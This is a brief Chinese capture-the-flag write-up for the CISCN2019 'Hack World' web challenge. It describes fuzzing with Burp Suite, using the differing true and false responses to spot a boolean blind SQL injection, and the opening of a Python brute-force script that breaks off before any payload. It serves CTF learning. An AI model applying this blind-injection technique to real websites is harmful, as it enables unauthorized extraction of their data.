[CISCN2019 华北赛区 Day2 Web1]Hack World
注入题:
直接抓包burpsuite fuzz测试
过滤了一些关键字,但能够看出来存在bool漏洞
发现当true时,Hello,glzjin wants a girlfriend.
fslse时,Error Occured When Fetch Result.
据此,写脚本
import requests
import string
import time
timeout=None
def bool_blind(url):
flag = ''
strings = string.printable
for i